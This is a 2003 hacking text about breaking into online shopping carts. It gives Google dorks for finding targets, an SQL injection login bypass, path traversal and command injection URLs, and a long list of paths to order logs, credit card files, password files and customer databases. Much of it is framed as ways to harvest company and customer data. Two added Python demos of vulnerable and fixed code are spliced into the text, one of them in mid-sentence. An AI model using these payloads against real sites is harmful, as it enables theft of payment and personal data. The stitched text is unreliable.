Shopping Carts and Weak Security
Explained by fris
Written on December 22nd 2003. Merry Christmas, Packetstorm Security.

Let's go through some of them.

--- Alabanza AlaCart Shopping Cart

This cart has a SQL injection in the admin login. Enter '=' as both the login and the password and you are logged in with access to everything; the whole company's data is exposed. The login script drops the submitted values straight into its query, so the WHERE clause becomes login=''='' AND password=''='', which a database with loose type comparison (MySQL, for one) evaluates as true.

How does a person find the admin section? Simple: Google. A search such as inurl:s-cart/admin brings up results.

--- CommerceSQL

Regarding: http://packetstormsecurity.nl/0311-exploits/commerceSQL.txt

Again, a Google search for inurl:admin/files/order.log finds installs. The page= parameter is used as a relative file name, so the admin configuration, the manager script and the order log can all be read. Proof of concept:

example: www.domain.com/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl
example: http://www.domain.com/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi
example: http://www.domain.com/cgi-bin/commercesql/index.cgi?page=../admin/files/order.log

--- Meta Cart

Meta Cart is a free e-commerce shopping cart system based on ASP and an Access database. The database holding the store's information sits at one of these locations:

http://www.domain.com/database/metacart.mdb
http://www.domain.com/metacart/database/metacart.mdb

So yet again you can do a simple inurl:metacart.mdb search in Google, grab the Access database, open it in Access, and you have the company's information.

This is why companies need to protect this data. It is a must for security reasons. All the admin would have to do is set the permissions on the database folder in Internet Information Services, but admins are lazy and don't double-check. When the folder holding the database is readable by the anonymous web user, anyone can download the .mdb. The fix is to deny Read to the anonymous (IUSR) account on the .mdb and its folder, or better still to move the database out of the web root altogether, while leaving the account the ASP scripts run as able to read and write it, so the shop itself keeps working.
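The AlaCart login bypass above, as an added example that is not the cart's own code: a Python sqlite3 mock of an admin login that interpolates the submitted credentials into SQL, next to the parameterised version that defeats it. The page's '=' payload turns the clause into login=''='' AND password=''=''; MySQL evaluates (login='')='' as 0='' and converts the empty string to 0, so it is true. SQLite compares types strictly, so the runnable part of the demo uses the equivalent ' OR ''=' payload, which abuses the same unescaped quote. The table, the admin/s3cret account and the payload strings are constructed for the demo.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed demo table: admin/s3cret is the only valid account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admins (login TEXT, password TEXT)")
    conn.execute("INSERT INTO admins VALUES ('admin', 's3cret')")
    return conn


def build_vulnerable_sql(login: str, password: str) -> str:
    """How the broken login builds its query: raw string interpolation.
    A single quote in either field ends the literal and the rest is SQL."""
    return ("SELECT login FROM admins WHERE login='%s' AND password='%s'"
            % (login, password))


def vulnerable_login(conn: sqlite3.Connection, login: str, password: str) -> bool:
    """Runs the interpolated query; any row back counts as a successful login."""
    return conn.execute(build_vulnerable_sql(login, password)).fetchone() is not None


def safe_login(conn: sqlite3.Connection, login: str, password: str) -> bool:
    """Parameterised query: the driver passes the values separately from the
    SQL text, so quotes in the input are data and never change the WHERE clause."""
    row = conn.execute(
        "SELECT login FROM admins WHERE login=? AND password=?",
        (login, password),
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    db = make_db()
    print(build_vulnerable_sql("'='", "'='"))          # the clause the text describes
    print(vulnerable_login(db, "' OR ''='", "' OR ''='"))  # True: bypassed
    print(safe_login(db, "' OR ''='", "' OR ''='"))        # False: rejected
```

The point of the pair is that escaping the quote by hand is not the fix; binding the values as parameters is, because the database never sees them as part of the statement.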
---- SHOP.PL

Yet another system used against companies to get at their files and data. The page= parameter names the file to display and is not restricted to the template directory. Proof of concept:

http://www.domain.com/cgi-local/shop.pl/page=shop.cfg is where the config file is located.
http://www.domain.com/cgi-local/shop.pl/page=../../../../../../../../../../../../../../etc/passwd
http://www.domain.com/cgi-local/shop.pl/page=./product_list

And again you can do a simple Google search for inurl:shop.pl

--- Windows servers vulnerable through lazy admins: a way to get .mdb files (Access databases) off ASP servers

Search for shopdisplaycategories.asp with inurl:shopdisplaycategories.asp; plenty of sites use this. Once you have some results, change the URL on the site to

http://www.domain.com/shopdbtest.asp

You are now on a diagnostics page that tells you where the .mdb file is lying, for example xDatabase: shopping and xDblocation: \shop_db. Now just request

http://www.domain.com/shop_db/shopping.mdb

Basically you can download their Access database with their whole online shop and all their customer data. Lazy admins that don't set the correct permissions leave this open; smart ones won't let you download the database.

--- Other key tricks

In Google, search for "/cgi/shopper.cgi?" or, for more results, "/cgi-bin/shopper.cgi?"
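The file disclosure behind shop.pl's page= parameter above (and the shopper.cgi template= trick further down, which is the same bug), as an added example that is not the carts' own code: a Python model of a CGI that joins the user-supplied name onto its template directory, beside a hardened version that refuses separators and checks the resolved path stays inside that directory. The web tree, the template and the order log contents are constructed in a temporary directory for the demo; make_demo_root, vulnerable_render and safe_render are names chosen here.

```python
import tempfile
from pathlib import Path

# Constructed file contents for the demo web tree.
PRODUCT_LIST = "<h1>Products</h1>\n"
SHOP_CFG = "db_user=shop\ndb_pass=hunter2\n"
ORDER_LOG = "2003-12-22 order#1 card=4111111111111111 exp=12/05\n"


def make_demo_root() -> Path:
    """Lay out a fake web root: cgi-local/templates is the only folder the
    script should ever read from; shop.cfg and orders.log sit outside it."""
    root = Path(tempfile.mkdtemp())
    templates = root / "cgi-local" / "templates"
    templates.mkdir(parents=True)
    (templates / "product_list").write_text(PRODUCT_LIST)
    (root / "cgi-local" / "shop.cfg").write_text(SHOP_CFG)
    (root / "orders").mkdir()
    (root / "orders" / "orders.log").write_text(ORDER_LOG)
    return root


def vulnerable_render(root: Path, page: str) -> str:
    """shop.pl style: page= is appended to the template directory and opened.
    Every '..' component walks one directory up, so ../shop.cfg and
    ../../orders/orders.log come straight back as the page body."""
    path = root / "cgi-local" / "templates" / page
    return path.read_text()


def safe_render(root: Path, page: str) -> str:
    """Hardened: a template name is a bare file name, never a path. Reject
    separators and dot-prefixed names, then confirm the resolved target's
    parent is exactly the template directory (resolve() follows symlinks on
    both sides, so a symlinked tmp dir does not break the comparison)."""
    templates = (root / "cgi-local" / "templates").resolve()
    if not page or "/" in page or "\\" in page or page.startswith("."):
        raise PermissionError("bad template name: %r" % page)
    target = (templates / page).resolve()
    if target.parent != templates:
        raise PermissionError("template outside allowed directory")
    return target.read_text()


if __name__ == "__main__":
    demo = make_demo_root()
    print(vulnerable_render(demo, "../../orders/orders.log"))  # leaks the log
    try:
        safe_render(demo, "../../orders/orders.log")
    except PermissionError as exc:
        print("blocked:", exc)
```

Note that the hardened version does not try to strip "../" out of the input; stripping can be bypassed with encodings and nested sequences, while checking the resolved path cannot.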
("shopcart.cgi" can also be used). Find a site (look for "your shopping cart" or "Subtotal $0.00") and remove everything after shopper.cgi (the URL should contain "/cgi/shopper.cgi?display=action" or "/cgi-bin/shopper.cgi?display=action", or possibly "checkout=action"). Then add "?search=action&keywords=%20&template=order.log" to the URL. The template= parameter is used as a file name, so the cart's own order log and configuration come back as the page:

/cgi-bin/shopper.cgi?search=action&keywords=apollos%2520&template=order.log
/cgi-bin/shopper.cgi?search=action&keywords=cgi_bin%20&template=order.log
/cgi-bin/shopper.cgi?search=action&keywords=cgi_bin%2520&template=shopper.conf
/cgi-bin/shopper.cgi?search=action&keywords=powerd0wn%20&template=shopper.conf
/cgi-bin/pdg_cart/shopper.conf
/cgi-bin/products/loadpage.cgi?user_id=id&file=/orders.txt

are some results to play with.

--- Other vulns found with Google searching

inurl:shopping.mdb inurl:cart/cart.asp inurl:/productcart inurl:vti_inf.html inurl:service.pwd inurl:users.pwd inurl:authors.pwd inurl:administrators.pwd inurl:shtml.dll inurl:shtml.exe inurl:fpcount.exe inurl:default.asp inurl:showcode.asp inurl:sendmail.cfm inurl:getFile.cfm inurl:imagemap.exe inurl:test.bat inurl:msadcs.dll inurl:htimage.exe inurl:counter.exe inurl:browser.inc inurl:hello.bat inurl:default.asp\ inurl:dvwssr.dll inurl:cart32.exe inurl:add.exe inurl:index.jsp inurl:SessionServlet inurl:glimpse inurl:man.sh inurl:AT-admin.cgi inurl:AT-generate.cgi

--- Scanners

Once you have found a site, you can use various scanners.

WIN32 scanners:
http://packetstormsecurity.nl/UNIX/cgi-scanners/voideye.zip is a very good one.
http://rhino.deny.de/ Triton Scanner
http://www.ksoze.deny.de/ ksoze's Scanner
http://wolfman.deny.de/ webshare scanner
http://xtremet.deny.de/ cmx scanner
http://www.accessdiver.com Accessdiver
http://www.safety-lab.com Shadow Security Scanner (shareware)

UNIX (open source):
http://packetstormsecurity.nl/UNIX/cgi-scanners/nikto-1.31.tar.gz

All of these can load a path list. To audit your own servers for these holes, here is an updated list of security holes
against most of the shopping carts. Admins, please protect your systems; you don't want your customers' data at risk.

--- Loadable list to test security --

/store/log_files/your_order.log /cgi-bin/DCShop/Orders/orders.txt /vpasp/shopdbtest.asp /orders/checks.txt /WebShop/logs /ccbill/secure/ccbill.log /scripts/cart32.exe /cvv2.txt /cart/shopdbtest.asp /cgi-win/cart.pl /shopdbtest.asp /WebShop/logs/cc.txt /cgi-local/cart.pl /PDG_Cart/order.log /config/datasources/expire.mdb /cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.log%00html /orders/orders.txt /cgis/cart.pl /webcart/carts /cgi-bin/cart32.exe/cart32clientlist /cgi/cart.pl /comersus/database/comersus.mdb /WebShop/templates/cc.txt /Admin_files/order.log /orders/mountain.cfg /cgi-sys/cart.pl /scripts/cart.pl /htbin/cart.pl /productcart/database/EIPC.mdb /shoponline/fpdb/shop.mdb /config/datasources/myorder.mdb /PDG_Cart/shopper.conf /shopping/database/metacart.mdb /bin/cart.pl /cgi-bin/cart32.ini /database/comersus.mdb /cgi-local/medstore/loadpage.cgi?user_id=id&file=data/orders.txt /cgi-bin/store/Admin_files/myorderlog.txt /cgi-bin/orders.txt /cgi-bin/store/Admin_files/your_order.log /test/test.txt /fpdb/shop.mdb /cgibin/shop/orders/orders.txt /shopadmin1.asp /cgi-bin/shop.cgi /cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi /cgi-bin/PDG_cart/card.txt /shopper.cgi?preadd=action&key=PROFA&template=order1.log /store/shopdbtest.asp /log_files/your_order.log /_database/expire.mdb /HyperStat/stat_what.log /cgibin/DCShop/auth_data/auth_user_file.txt /htbin/orders/orders.txt /SHOP/shopadmin.asp /index.cgi?page=../admin/files/order.log /vpshop/shopadmin.asp /webcart/config /PDG/order.txt /cgi-bin/shopper.cgi /orders/order.log /orders/db/zzzbizorders.log.html /easylog/easylog.html /cgi-bin/store/Log_files/your_order.log /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=shopping400.mdb /comersus_message.asp?
/orders/import.txt /htbin/DCShop/auth_data/auth_user_file.txt /admin/html_lib.pl /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=myorder.txt /cgi-bin/DCShop/auth_data/auth_user_file.txt /cgi-bin/shop.pl/page=;cat%20shop.pl /cgi-bin/shopper?search=action&keywords=dhenzuser%20&template=order.log /HBill/htpasswd /bin/shop/auth_data/auth_user_file.txt /cgi-bin/cs/shopdbtest.asp /mysql/shopping.mdb /Catalog/config/datasources/Products.mdb /trafficlog /cgi/orders/orders.txt /cgi-local/PDG_Cart/shopper.conf /store/cgi-bin/Admin_files/expire.mdb /derbyteccgi/shopper.cgi?key=SC7021&preadd=action&template=order.log /derbyteccgi/shopper.cgi?search=action&keywords=moron&template=order.log /cgi-bin/mc.txt /cgi-bin/mall2000.cgi /cgi-win/DCShop/auth_data/auth_user_file.txt /cgi-bin/shopper.cgi?search=action&keywords=root%20&template=order.log /store/commerce.cgi /scripts/shop/orders/orders.txt /product/shopping350.mdb /super_stats/access_logs /cgi-local/orders/orders.txt /cgi-bin/PDG_Cart/mc.txt /cgibin/cart32.exe /cgi-bin/Shopper.exe?search=action&keywords=psiber%20&template=other/risinglogorder.log /cgibin/password.txt /Catalog/cart/carttrial.dat /catalog/Admin/Admin.asp /ecommerce/admin/user/admin.asp /data/productcart/database/EIPC.mdb /store/admin_files/commerce_user_lib.pl /cgi-bin/store/index.cgi /paynet.txt /config/datasources/store/billing.mdb /_database/shopping350.mdb /cgi-bin/shopper.exe?search /cgi/shop.pl/page=;cat%20shop.pl /cgi-bin/store/Admin_files/orders.txt /cgi-bin/store/commerce_user_lib.pl /cgi-sys/pagelog.cgi /cgi-sys/shop.pl/page=;cat%20shop.pl /scripts/weblog /fpdb/shopping400.mdb /htbin/shop/orders/orders.txt /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=myorder.log /cgi-bin/shopper.exe?search=action&keywords=psiber&template=order.log /mall_log_files/ /cgi-bin/perlshop.cgi /tienda/shopdbtest.asp /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=shopping.mdb /cgi-bin/shopper.cgi?search=action&keywords=whinhall&template=order.log 
/WebShop/logs/ck.log /fpdb/shopping300.mdb /mysql/store.mdb /cgi-bin/store/Admin_files/commerce_user_lib.pl /config.dat /order/order.log /commerce_user_lib.pl /Admin_files/AuthorizeNet_user_lib.pl /cvv2.asp /cgi-bin/cart32/CART32-order.txt /wwwlog /cool-logs/mlog.html /cgi-bin/pass/merchant.cgi.log /cgi-local/pagelog.cgi /cgi-bin/pagelog.cgi /cgi-bin/orders/cc.txt /cgis/shop/orders/orders.txt /admin/admin_conf.pl /cgi-bin/pdg_cart/order.log /cgi/PDG_Cart/order.log /Admin_files/ccelog.txt /cgi-bin/orders/mc.txt /cgi/cart32.exe /ecommerce/admin/admin.asp /scripts/DCShop/auth_data/auth_user_file.txt /Catalog/config/datasources/Expire.mdb /ecommerce/admin/shopdbtest.asp /mysql/mystore.mdb /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=shopping.asp /cgi-bin/commercesql/index.cgi?page=../admin/files/order.log /cgi-bin/Count.cgi?df=callcard.dat /logfiles/ /shopping/shopping350.mdb /admin/configuration.pl /cgis/DCShop/auth_data/auth_user_file.txt /cgis/cart32.exe /cgi-bin/dcshop.cgi /cgi-win/shop/auth_data/auth_user_file.txt /shopping400.mdb /HBill/config /cgi-bin/shop/index.cgi?page=../admin/files/order.log /search=action&keywords=GSD%20&template=order.log /WebCart/orders.txt /PDG_Cart/authorizenets.txt /cgi-bin/AnyForm2 /~gcw/cgi-bin/Count.cgi?df=callcard.dat /cgi-bin/PDG_Cart/order.log /expire.mdb /logger/ /webcart-lite/orders/import.txt /cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl /cgi-bin/PDG_Cart/shopper.conf /cgi-bin/cart32.exe /dc/orders/orders.txt /cgi-local/DCShop/orders/orders.txt /shop.pl/page=shop.cfg /cgi-local/cart32.exe /cgi-win/pagelog.cgi /cgi-win/shop/orders/orders.txt /cgibin/shopper.cgi?search=action&keywords=moron&template=order.csv /cgi-sys/DCShop/auth_data/auth_user_file.txt /cgi-bin/www-sql;;; /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=order.log /scripts/orders/orders.txt /cgi-local/shop.pl/shop.cfg /search=action&keywords=cwtb%20&template=expire.mdb /php/mylog.phtml /config/datasources/shopping.mdb 
/php-coolfile/action.php?action=edit&file=config.php /cgi-bin/ezmall2000/mall2000.cgi /cgi/DCShop/orders/orders.txt /cgi-local/shop.pl /cgis/DCShop/orders/orders.txt /product/shopdbtest.asp /ASP/cart/database/metacart.mdb /cgi-bin/cgi-lib.pl /cgi-bin/mailview.cgi?cmd=view&fldrname=inbox&select=1&html /search=action&keywords=cwtb%20&template=order.log /mysql/expire.mdb /scripts/shop/auth_data/auth_user_file.txt /cgi-bin/cart32/whatever-OUTPUT.txt /Shopping%20Cart/shopdbtest.asp /cgi/shop/auth_data/auth_user_file.txt /shop/shopping350.mdb /cgi-bin/store/Authorize_Net.pl /scripts/DCShop/orders/orders.txt /store/log_files/commerce_user_lib.pl /shopping/shopadmin.asp /cgi-bin/orderlog.txt /cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20../../webcart/system/orders/orders.txt|&CODE=PHOLD;;; /cool-logs/mylog.html /cgibin/shop.pl/page=;cat%20shop.pl /htbin/shop.pl/page=;cat%20shop.pl /cgi-win/orders/orders.txt /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=order1.txt /SHOP/shopdbtest.asp /cgi/pagelog.cgi /php/mlog.phtml /cgi-bin/shop/apdproducts.mdb /htbin/shop/auth_data/auth_user_file.txt /server%20logfile;;; /database/metacart.mdb /cgi-local/shop/orders/orders.txt /dcshop/auth_data/auth_user_file.txt /log/ /cgi-bin/shop.cgi/page=../../../../etc/hosts /scripts/c32web.exe /cgis/orders/orders.txt /logfile/ /shop_db/shopping.mdb /shopping.mdb /weblog/ /config/datasources/cvv2.mdb /cgi-bin/loadpage.cgi?user_id=id&file=data/db.txtcgi-bin/PDG_Cart/order.log /cgi-sys/shop/orders/orders.txt /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=order1.log /cgi-win/cart32.exe /cgi-bin/loadpage.cgi /dcshop/orders/orders.txt /shop/show.php?q=' /cgibin/orders/orders.txt /bin/pagelog.cgi /cgi-bin/shop/orders/orders.txt /_database/shopdbtest.asp /cgibin/pagelog.cgi /cgi-local/shop.pl/page=;cat%20shop.pl /shop/search.php?q=' /cgi-sys/cart32.exe /order13.txt /weblogs/ /orderb/shop.mdb /config/datasources/order.mdb 
/store/cgi-bin/Admin_files/Store_user_lib.pl /cgi-bin/shopper/cheddar/loadpage.cgi?user_id=id&file=data/db.txt;CC /Orders/order.log /logs/access_log /config/datasources/your_order.mdb /ecommerce/admin/admin/admin.asp /mall_log_files/order.log /bin/cart32.exe /htbin/DCShop/orders/orders.txt /Admin_files/Authorize_Net.pl /logging/ /database/ /cgi-sys/shop/auth_data/auth_user_file.txt /bin/shop.pl/page=;cat%20shop.pl /cgi-local/shop/auth_data/auth_user_file.txt /cgi-local/DCShop/auth_data/auth_user_file.txt /cgi-bin/shop/auth_data/auth_user_file.txt /cgi-win/DCShop/orders/orders.txt /store/Admin_files/Authorize_Net.pl /cart/cart.asp /bin/DCShop/orders/orders.txt /scripts/pagelog.cgi /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=expire.mdb /webcart/config/clients.txt /dc/auth_data/auth_user_file.txt /cgi-bin/shopper.exe?preadd=action&key=9461&template=order.log /cgi-bin/shopper/cheddar/loadpage.cgi?user_id=id&file=data/db.txt /bin/orders/orders.txt /cgi-bin/Web_Store/web_store.cgi /cgis/pagelog.cgi /cgi-bin/orders/orders.txt /merchant/shopdbtest.asp /cgi-local/shop.pl/page=shop.cfg /cgis/shop.pl/page=;cat%20shop.pl /index.cgi?%20pagine%20=%20../../../../../../../../etc/passwd /cg-bin/ /cgi-bin/shopper.cgi&TEMPLATE=ORDER.LOG /cgi-bin/DCShop/Auth_data/auth_user_file.txt /ecommerce/admin/adminLeft/admin.asp /webcart/orders/import.txt /cgibin/shop/auth_data/auth_user_file.txt /productcart/database/eipc.mdb /mysql/cheersoundchdb.mdb /cgi-bin/order.txt /scripts/iisadmin/tools/mkilog.exe /ProductCart/database/EIPC.mdb /databases/ /cgi-sys/orders/orders.txt /cgi/DCShop/auth_data/auth_user_file.txt /database/EIPC.mdb //cgi-bin/orders.txt /vpasp-shopcart/shopdbtest.asp /cgi-bin/shopper.exe?preadd=action&key=bajk390ss&template=order.log /cgi-bin/DCShop/orders/orders.txt /mysql/shopping350.mdb /_database/shopping.mdb /htbin/cart32.exe /PDG_Cart/shopper.config /cgis/shop/auth_data/auth_user_file.txt /shop/SHOPDBTEST.ASP /bin/shop/orders/orders.txt 
//cgi-local/medstore/loadpage.cgi?user_id=id&file=data/orders.txt /cgi-bin/store/dcshop_admin.cgi /_database/shopping400.mdb /scripts/shop.pl/page=;cat%20shop.pl /cgibin/PDG_Cart/shopper.conf /cgibin/DCShop/orders/orders.txt /cgibin/%20awstats.pl?output=keywords /cgi/shop/orders/orders.txt /cgi-bin/cart32_old.exe /webshop/templates/cc.txt /webcart/orders /productcart/database/shop.mdb /index.php?link=order /cgi-bin/store/index.cgi?page=../../../../../../../../etc/passwd /shopping/shopdisplayproducts.asp? /ccbill-local.cgi /bin/DCShop/auth_data/auth_user_file.txt /cgi-bin/c32web.exe/CheckError?error=53 /server/admin_files/commerce_user_lib.pl /shopping/shopdisplayproducts.asp?id=1&cat=order.log /mail.cgi /cgibin/admin_files/ /cgi-bin/mail/form.cgi /cgibin/shopping/database/metacart.mdb /globill/ver12otellog.txt /cgi-bin/shopping.mdb /shopping%20.mdb /cgi-bin/mail.cgi /cgi-bin/FORM.cgi /cgibin/shop/database/metacart.mdb /mail/form.cgi /cgibin/shop/shopping350.mdb /form.cgi /shopping/cgi-bin/cart32.ini /index.cgi?page=../../../../../../../../etc/passwd /cgi-bin/c32web.exe/ShowProgress /vpasp/shopdisplayproducts.asp?cat=qwerty'%20union%20select%20fldauto /cgibin/orders.txt /cgibin/scripts/shop/shopping350.mdb /form/mail.cgi /cgi-bin/store1b/index.cgi?page=../../../../../../../../etc/passwd /webshop/logs/cc.txt /form/form.cgi /store/index.cgi?page=../../../../../../../../etc/passwd /cgibin/awstats.pl%3Flang%3Dit%26output%3Durldetail /cgibin/%20awstats.pl? /cgi-bin/Form.cgi /vpasp/shopdisplayproducts.asp?cat=admin'%20and%20fldpassword%0li%20ke%20'a%25 /admin.mdb /cgi-bin/cart32.exe/error /cgi/mail.cgi /cgi-bin/c32web.exe/ShowAdminDir /cgi-bin/csql/index.cgi?page=../admin/files/order.log /cgi-bin/admin_files/ /cgi-bin/csql/index.cgi?page=../../../../../../../../etc/passwd /admins.asp /cgi-bin/cart_top /cgi-bin/mail/mail.cgi /shopadmin.asp /cgi-bin/order.log /mailform.pl /cgibin/admin.pl /vpasp/shopdisplayproducts.asp? 
/policies1.htm /cgi-bin/c32web_old.exe /cgi-bin/c32web.exe /cgi-bin/form/form.cgi /cgibin/metacart.mdb /shopdisplayproducts.asp /cgi-sys/DCShop/orders/orders.txt /ccbill6/secure/ /MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=3124&STRMVER=4&CAPREQ=0 /cgi-bin/ibill.log /ccbill6/ /password.txt /cgi-bin/PDG_cart/card /cgibin/www.google.com /honeymoonhideaway.htm+honeymoon+charleston /cgibin/awstats.pl%3Flang%3Dnl /cgibin/admin.pl?setpasswd /cgibin/awstats.pl%3Fyear%3D2003%26month%3D07 /cgibin/awstats.pl%3Fyear%3D2003%26month%3D08 /cgibin/awstats.pl%3Fyear%3D2003%26month%3D09 /cgibin/%20awstats.pl?output=keywords /shop/shopping450.mdb /ccbill6/secure/ccbill.log /cgibin/awstats.pl%3Flang%3Des%26update%3D1 /cgibin/shopper.cgi?search=action&keywords=ccpower%20&template=shopper.conf /cgi-bin/form.cgi /M83A /cgibin/awstats.pl%3Fyear%3D2003%26month%3D11 /cgibin/amadmin.pl?setpasswd /cgi-bin/awstats.pl%3Flang%3Dit /orderdb/database/eipc.mdb /cg-bin//eshop/database/order.mdb /store/database/comersus.mdb /cgibin/password.mdb /~admin/guestbook /cgibin/%20awstats.pl?%20cgibin/%20awstats.pl?output=keywords /cgibin/awstats.pl%3Foutput%3Durldetail%26lang%3Dnl /cgibin/%20awstats.pl?output=keywords /sumthin /cgibin/cgibin/%20awstats.pl?output=keywords /cgi-bin/shopper.cgi?search=action&keywords=ccpower&template=shopper.conf /cgibin/productcart/database/eipc.mdb /cgibin/awstats.pl%3Flang%3Den%26output%3Durldetail /cgibin/awstats.pl%3Foutput%3Dkeyphrases%26lang%3Dit /cgibin/awstats.pl%3Foutput%3Durldetail%26lang%3Dde /mail/mail.cgi /cgibin/shopper.cgi?search=action&keywords=ccpower&template=shopper.conf /cgibin/awstats.pl%3Foutput%3Dkeywords%26lang%3Dnl /cg/.%20/comersus/database/comersus.mdb /index%20of%20/%20productcart/database/eipc.mdb /scripts/nsiislog.dll /cgibin/order.cgi /_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=2614&STRMVER=4&CAPREQ=0 /cgi-bin/awstats.pl%3Flang%3Dde /_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=3124&STRMVER=4&CAPREQ=0 /cgibinserver/admin_files/commerce_user_lib.pl 
/cgibin/store/Admin_files/myorderlog.txt //cgibin/orders.txt /cgibin/database/shopping.mdb /cgibin/shopping/shopadmin.asp /cgi-bin/shopper.cgi?preadd=action&key=PROFA&template=order1.log /cgibin/shopper.exe?search=action&keywords=psiber&template=order.log /cgibin/allmanageup.pl /cgi-win/shop.pl/page=;cat%20shop.pl /eshop/database/log.mdb /cgibin/awsta /cgibin/nph-proxy.pl /cgibin/awstats.pl%3Flang%3Dnl%26update%3D1 //config/datasources/expire.mdb /cgibin/awstats.pl%3Foutput%3Dkeywords%26lang%3Den /cgibin/awstats.pl%3Foutput%3Dkeywords%26lang%3Des /cgibin/ccbill/password/.htpasswd /cgi-bin/awstats.pl%3Fyear%3D2003%26month%3D08 /cgibin/awstats.pl%3Flang%3Dde%26output%3Dkeyphrases /eshop/en/database/credit.mdb /cgi-bin/pdg_cart/shopper.conf /password.mdb /data/verotellog.txt /cgibin/awstats.pl%3Foutput%3Durldetail%26update%3D1 /productcart/eipc.mdb /cgi-bin/awstats.pl%3Fyear%3D2003%26month%3D11 /cgibin/awstats.pl%3Foutput%3Durldetail%26lang%3Dit /index%20of%20/webshop/templates/cc.txt /cartdb/database/eipc.mdb /cgi-bin/eshop/database/order.mdb /cgibin//fpdb/shopping400.mdb /cgibin/order.txt /cgi-bin/cart32.exe/expdate%20algunas%20veces /cgibin/awstats.pl%3Flang%3Dde%26output%3Dkeywords /cgibin/database/comersus.mdb /cgi-bin/awstats.pl%3Flang%3Des /cgibin/awstats.pl%3Foutput%3Dkeywords%26lang%3Dfr /globill/ /cgibin/fpdb/shopping400.mdb /cgibin/perl.exe /eshop/en/database/log.mdb /cgibin/shopper.exe?search=action&keywords=psiber&template=orders.log /cg/comersus/database/comersus.mdb /cgi-bin/awstats.pl%3Fyear%3D2003%26month%3D07 /cgibin/awstats.pl%3Flang%3Dnl%26output%3Durldetail /cgibin/admin.mdb /cgi-bin/whereami.cgi?g=ls /cgibin/xxxhu /cgibin/cartserver/admin_files/commerce_user_lib.pl /cgibin/%20awstats.pl?output=keywords /cgibin/awstats.pl%3Foutput%3Dkeyphrases%26lang%3Dfr /robot.txt /cgi-bin/form/mail.cgi /ibill/mypins/ /cgi-bin/awstats.pl%3Flang%3Dnl /cgibin/allmanage_admin.pl /cgibin/%20awstats.pl?cgibin/%20awstats.pl?output=keywords /cg-ibin/admin_files/ 
/cgibin/cart/comersus.mdb /cg-bin/eshop/database/order.mdb /cgibin/htt /cgibin/phf /cgibin/awstats.pl%3Foutput%3Durldetail%26lang%3Den /database/eipc.mdb /MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=2614&STRMVER=4&CAPREQ=0 /script/shop/shopping350.mdb /cgibin/shopping350.mdb /cg-bin/eshop/en/database/credit.mdb /cgibin/awstats.pl%3Foutput%3Dkeyphrases%26lang%3Den /cgi-bin/add-passwd.cgi /logs/200306/charleston.com/ /random_banner/index.cgi?image_list=alternative_image.list&html_file=|ls%20-la| /cgibin/store/log_files/your_order.log /cgibin/shopper.exe?search=action&keywords=psiber&template=neworder.log /cgi-bin/awstats.pl%3Fyear%3D2003%26month%3D09 /cgibin/awstats.pl%3Flang%3Dfr%26update%3D1 /cgibin/awstats.pl%3Foutput%3Dkeywords%26update%3D1 /cgibin/awstats.pl%3Foutput%3Dkeyphrases%26lang%3Dnl /cgibin/awstats.pl%3Flang%3Dde%26output%3Durldetail /cgibin/mailform.pl /cgibin/awstats.pl%3Flang%3Des%26output%3Dkeywords /cgi-bin/shop/shopping350.mdb /cgibin/cart/database/comersus.mdb /dbase/date. /www.gambling-01.co.uk/cgibin/password.txt /cgibin/awstats.pl%3Flang%3Des /ccbill/ccbill.log /cgibin/awstats.pl%3Flang%3Dnl%26output%3Dkeywords /cgibin/awstats.pl%3Foutput%3Dkeyphrases%26lang%3Dde /productcart/pc/Custvb.asp?redirectUrl=&Email=%27+having+1%3D1--&_email=email&password=asd&_password=required&Submit.x=33&Submit.y=5&Submit=Submit /cgibin/index%20of /cgi-bin/form1.cgi /cc.txt /cgibin/awstats.pl%3Flang%3Den%26update%3D1 /cg/./comersus/database/comersus.mdb /cgi-bin/awstats.pl%3Foutput%3Dkeyphrases /cgibin/webshop/templates/cc.txt /....../ all /....../config.sys /....../etc/hosts /../../../../ all /../../../../../../../boot.ini /../../../../../winnt/repair/sam._ /../../../../config.sys /../../../../etc/hosts /.access /.bash_history /.htaccess /.html/............./config.sys /.htpasswd /.passwd /ASPSamp/AdvWorks/equipment/catalog_type.asp /Admin_files/order.log /AdvWorks/equipment/catalog_type.asp /Orders/order.log /PDG_Cart/order.log /PDG_Cart/shopper.conf 
